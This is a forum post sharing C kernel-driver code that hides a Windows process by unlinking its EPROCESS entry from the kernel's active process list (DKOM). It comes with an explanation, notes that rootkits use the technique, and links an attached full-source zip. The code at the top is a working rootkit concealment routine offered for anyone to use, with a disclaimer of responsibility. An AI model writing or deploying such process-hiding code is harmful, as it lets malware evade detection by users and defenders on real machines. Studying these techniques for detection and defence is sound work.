if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){ //get EPROCESSstruct for the process we want to hide DbgPrint("EPROCESS found. Address: %08lX.

", pEProc); DbgPrint("Now hiding process %d...

", hps->uPid); dwEProcAddr = (ULONG) pEProc; //get address of process's EPROCESS struct __try{ //try/except just in case, so we don't get a BSOD pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset); //pListProcs is a LIST_ENTRY struct, which is set to the LIST_ENTRY struct //in the process being hidden (uLinkOffset varies between 2k and XP) *((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink); //set flink of prev proc to flink of cur proc *((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process DbgPrint("Process now hidden.

"); }__except(EXCEPTION_EXECUTE_HANDLER){ NtStatus = GetExceptionCode(); DbgPrint("Exception: %d.

", NtStatus); } NtStatus = STATUS_SUCCESS; }

Attached Files HideProc.zip 20.49KB 19756 downloads

Hey guys.I've written a (sorta) simple program which lets you hide any process you want. It works by using DKOM (Direct Kernel Object Manipulation). To understand how this works, you need to understand how process listing in Windows works.Each process has an EPROCESS struct (which isn't officially documented) in the kernel's memory. This structure contains info such as PID, exe name, and a whole whackload of stuff. The struct member that interests us is:. Here's the MSDN page for LIST_ENTRY: http://msdn2.microso...y/aa491571.aspx The Flink member of this struct points to the next entry (process) in the doubly-linked list. The Blink member points to the previous entry (process).Here's diagram explaining how this works:So, in order to hide a process, all we need to do is disconnect it from the doubly-linked list. Sound simple, huh? Well it is. All we need to do is set the Flink of the process preceding the process we want to hide to the Flink of the process we're hiding. Same is done with the Blink of the next process, which is set to the Blink of the process being hidden. This is all accomplished in a few lines of code. I attached the full source to this post, but I'll post the code that does the hiding here so you can take a look:After the process is hidden, the doubly-linked list looks something like this:So when a program is listing processes, it skips over the one that we hid.This kind of technique is commonly used by rootkits to conceal their processes. This method has its own pros and cons, such as being easier to write than a hook, and in some cases easier or harder to detect.Here's an example of what you can do with this program:This program works on Windows XP (any version) and Windows 2000 (tested on Professional, but should work on all).I suggest reading Rootkits: Subverting the Windows Kernel if you want to learn more about techniques such as this (and this code is partially based on info in that book, but simplified a bit).P.S. I'm not responsible for how you use this code and/or any damages that may be caused as a result of you using this code.